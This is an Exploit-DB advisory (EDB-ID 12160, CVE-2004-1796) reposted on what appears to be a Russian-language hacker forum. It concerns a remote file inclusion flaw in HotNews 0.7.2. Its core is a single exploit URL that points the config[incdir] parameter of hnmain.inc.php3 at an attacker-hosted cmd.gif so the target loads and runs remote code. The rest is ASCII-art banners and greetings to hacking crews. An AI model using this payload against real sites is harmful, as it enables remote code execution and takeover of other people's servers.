Exploit HotNews 0.7.2 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12160
Проверка EDB
  1. Пройдено
Автор
TEAM_ELITE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-1796
Дата публикации
2010-04-11
Код:
================================================================================================
================================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@            @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@	       @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@            @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@            @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==											      ==
================================================================================================
================================================================================================
		 |||                                    |||
		 |||					|||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[  								                                                        [[
[[ HotNews 0.7.2 Remote File Inclusion Vulnerability            						        [[
[[															[[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				       	[[
[[															[[
[[															[[
[[ ##   Exploit:        											        [[
[[															[[
[[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif???                            [[
[[															[[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
		 |||					|||
		 |||					|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~									~~~~
~~~~    MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~
~~~~    thanks for : cr4wl3r [ http://shell4u.tk/ ]		        ~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* -                          ,              
* -                        @@               
* -                      @@#                
* -                    :@@;                 
* -                   @@@@@        ......`  
* -                  @@@@.@@@@@@@@@@@#      
* -             @@@@@@@@@@@@@@@@@@`         
* -               @@@@@@@@@@@@@@@@@@@@;     
* -              #@@@@@@@@@@@@@@@@@         
* -            `@@,@@@@@@@@@@@@@@@@@:       
* -           @@@+@@@@@@@ @@@@@@@;@@@`      
* -         :@@@@@@@@@:@,; @@@@@@@ .@@      
* -        @@@@@@@@@@@  :  @@@@@@@@  @@     
* -       @@@@'     `   ` @@@@@@@@@:  +.    
* -       .@@            @@@@@@@@@@@   .    
* -           ,       +@@@@@@@@@@@@@        
* -            +@@@@@@@@@@@@@@@@@@@@#       
* -           ,@@@@@@@@@@@@@@@@@ +@@@       
* -        `@@@@@@@@@@@@@@@@@@@   @@@       
* -       @@@@@@@@@@@@@@@@@@@     @@`       
* -      @@@@@@@@@@@@@@@@@@       @@        
* -     +@@@@@@@@@@; @@@#         @         
* -     @@@@@@@@@         :                 
* -     @@@@@@@@           ,@@              
* -    @@@@@@@@@             @@@'           
* -    @@@@@@@`@               @@@;         
* -    @@@@@@@  @       @.  @@@@@@@@        
* -    @@@@@@@@@        @@@@@@@@@@@@@#      
* -     @@@@@@@@@@@@    @@@@@@@@@@@@@@@     
* -     @ @@@@@@@     ;@@@@@@@@@@@@@@@@@    
* -     @ @@@@@@@@@@@@@@@@@@@      ,@@@@+   
* -       @@@@@@@@@@@@@@@@@@@        @@@@   
* -       @@@ @@@@@@@@@  @@@@@@;     @@@@   
* -       @@    @@@@@@@`  @@@        . @@.  
* -       @@      ; @@@@#  :@@@@@#     @@.  
* -       @           @@@:             ;@   
* -      ;`             @@             ;@   
* -                      @@            @    
* -                       @            #    
* -                       :           :     
* --------------------------------------------->>>> bugs found on 11 April 2010 by team_elite.
 
Источник
www.exploit-db.com

Похожие темы